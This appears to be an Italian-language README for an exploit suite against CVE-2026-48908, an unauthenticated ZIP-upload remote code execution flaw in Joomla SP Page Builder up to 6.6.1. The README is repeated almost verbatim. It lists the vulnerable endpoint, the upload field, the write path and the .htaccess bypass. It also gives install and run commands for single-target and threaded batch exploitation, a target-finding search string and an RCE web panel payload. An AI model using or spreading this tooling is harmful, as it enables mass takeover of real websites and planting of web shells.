
Suite di exploit in Python per CVE-2026-48908, un RCE tramite upload ZIP non autenticato in Joomla SP Page Builder (<=6.6.1), con fingerprinting, modalità batch e un payload per pannello RCE.
SP Page Builder (Joomla) — Caricamento ZIP non autenticato → RCE
| Prodotto | SP Page Builder — com_sppagebuilder (JoomShaper) |
| Versione | ≤ 6.6.1 |
| Fixed | 6.6.2+ — l'upload ora richiede admin |
| Auth | Unauthenticated |
| Vettore | POST …&task=asset.uploadCustomIcon |
| Campo | custom_icon (icon-font ZIP) |
| Percorso di scrittura | /media/com_sppagebuilder/assets/iconfont/<pack>/fonts/ |
| Bypass | .PHP + fonts/.htaccess |
/media/com_sppagebuilder/ → disabilitare l'esecuzione PHP.htaccesscustom_icongit clone https://github.com/winrarzipsexploit/CVE-2026-48908.git
cd CVE-2026-48908
pip install -r requirements.txt
| File | Ruolo |
|---|---|
winrarzips_brand.py | Banner CMD (by winrarzips) |
sppb48908_core.py | Motore exploit |
CVE-2026-48908-Suite.py | CLI batch + singolo target |
CVE-2026-48908.py | Wrapper singolo target |
payloads/x7-panel.php | Pannello RCE |
requirements.txt | Dipendenze |
❌ Liste di target, risultati di scansione e URL dei pannelli non sono presenti nel repo.
python CVE-2026-48908-Suite.py -u https://LAB-URL --fingerprint
python CVE-2026-48908-Suite.py -u https://LAB-URL --yes
python CVE-2026-48908-Suite.py -f targets.txt --yes --threads 15
body="com_sppagebuilder"
patched_662_plus · upload_rejected · waf_cloudflare · sppb_html_no_json · upload_server_failed
SP Page Builder (Joomla) — Caricamento ZIP non autenticato → RCE
| Prodotto | SP Page Builder — com_sppagebuilder (JoomShaper) |
| Affected | ≤ 6.6.1 |
| Fixed | 6.6.2+ — l'upload richiede admin |
| Auth | Unauthenticated |
| Vettore | POST …&task=asset.uploadCustomIcon |
| Campo | custom_icon (icon-font ZIP) |
| Percorso di scrittura | /media/com_sppagebuilder/assets/iconfont/<pack>/fonts/ |
| Bypass | .PHP + fonts/.htaccess |
/media/com_sppagebuilder/.htaccesscustom_icongit clone https://github.com/winrarzipsexploit/CVE-2026-48908.git
cd CVE-2026-48908
pip install -r requirements.txt
| File | Ruolo |
|---|---|
winrarzips_brand.py | Banner CMD (by winrarzips) |
sppb48908_core.py | Core dell'exploit |
CVE-2026-48908-Suite.py | CLI batch + singolo target |
CVE-2026-48908.py | Wrapper singolo target |
payloads/x7-panel.php | Payload pannello RCE |
requirements.txt | Dipendenze |
❌ Liste di target, risultati di scansione e URL dei pannelli live non sono inclusi.
python CVE-2026-48908-Suite.py -u https://LAB-URL --fingerprint
python CVE-2026-48908-Suite.py -u https://LAB-URL --yes
python CVE-2026-48908-Suite.py -f targets.txt --yes --threads 15
body="com_sppagebuilder"
patched_662_plus · upload_rejected · waf_cloudflare · sppb_html_no_json · upload_server_failed